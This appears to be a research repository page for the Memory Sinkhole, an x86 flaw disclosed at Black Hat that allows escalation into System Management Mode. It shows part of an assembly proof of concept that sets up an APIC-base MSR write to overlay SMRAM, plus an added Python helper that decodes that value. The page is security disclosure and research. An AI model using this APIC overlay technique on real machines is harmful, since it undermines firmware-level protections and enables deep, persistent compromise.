Architectural privilege escalation on x86
Repository files:
LICENSE (update readme, Dec 31, 2015)
sinkhole.asm (Adjust comments, Aug 6, 2015)
us-15-Domas-TheMemorySinkhole-wp.pdf (Add white paper, Aug 12, 2015)
us-15-Domas-TheMemorySinkhole.pdf (Fix typo, Aug 12, 2015)

The Memory Sinkhole: An x86 design flaw allowing ring -2 privilege escalation.


The memory sinkhole is a design flaw in x86 processors that allows code to escalate privileges into ring -2 (System Management Mode).

; Stage an 8-byte value at address 0x10010, one dword at a time.
mov dword [0x10014], 0xffcf9aff
mov dword [0x10010], 0x9fa2ffff

; Prepare an IA32_APIC_BASE write: eax carries the new APIC base
; (0x1f5ff000 with bit 11, the APIC global enable, and bit 8, BSP, set),
; edx holds the upper 32 bits of the MSR value, ecx selects MSR 0x1b.
mov eax, 0x1f5ff900
mov edx, 0
mov ecx, 0x1b

; Spin in place.
jmp $

The proof of concept APIC overlay attack illustrates one approach for using the flaw to elevate privileges.
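As an added illustration (not code from the repository), the helper below decodes the IA32_APIC_BASE value the proof of concept loads into eax and reports whether the relocated 4 KiB APIC register page would overlap a protected SMRAM range; the SMRAM bounds are a constructed placeholder, and the field layout assumes a 36-bit physical address.

```python
# Added example, not part of the Memory Sinkhole repository: decode an
# IA32_APIC_BASE MSR value and check whether the APIC page it selects
# would overlap a protected SMRAM range (the range below is constructed).

IA32_APIC_BASE_MSR = 0x1B        # MSR index the PoC loads into ecx
APIC_BASE_MASK = 0xFFFFFF000     # bits 12..35: 4 KiB-aligned base (36-bit PA assumed)
APIC_WINDOW = 0x1000             # the local APIC register block is one 4 KiB page


def decode_apic_base(value):
    """Split an IA32_APIC_BASE value into its architectural fields."""
    return {
        "base": value & APIC_BASE_MASK,
        "bsp": bool(value & (1 << 8)),       # bootstrap processor flag
        "x2apic": bool(value & (1 << 10)),   # x2APIC mode enable
        "enabled": bool(value & (1 << 11)),  # xAPIC global enable
    }


def apic_overlaps(value, protected_start, protected_end):
    """True if the APIC page selected by `value` overlaps [start, end)."""
    base = value & APIC_BASE_MASK
    return base < protected_end and base + APIC_WINDOW > protected_start


# Constructed SMRAM (TSEG-style) range used only for illustration.
SMRAM_START = 0x1F500000
SMRAM_END = 0x1F600000


if __name__ == "__main__":
    poc_value = 0x1F5FF900       # eax value from the proof of concept
    reset_value = 0xFEE00900     # conventional APIC base after reset, for contrast
    for label, value in (("PoC", poc_value), ("reset", reset_value)):
        print(label, decode_apic_base(value),
              "overlaps SMRAM:", apic_overlaps(value, SMRAM_START, SMRAM_END))
```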


The technique is outlined in detail in the Black Hat presentation.

Slides from the presentation are provided here.

The exploit white paper provides a technical overview of the flaw and exploitation approach.


The Memory Sinkhole is a research effort from Christopher Domas (@xoreaxeaxeax).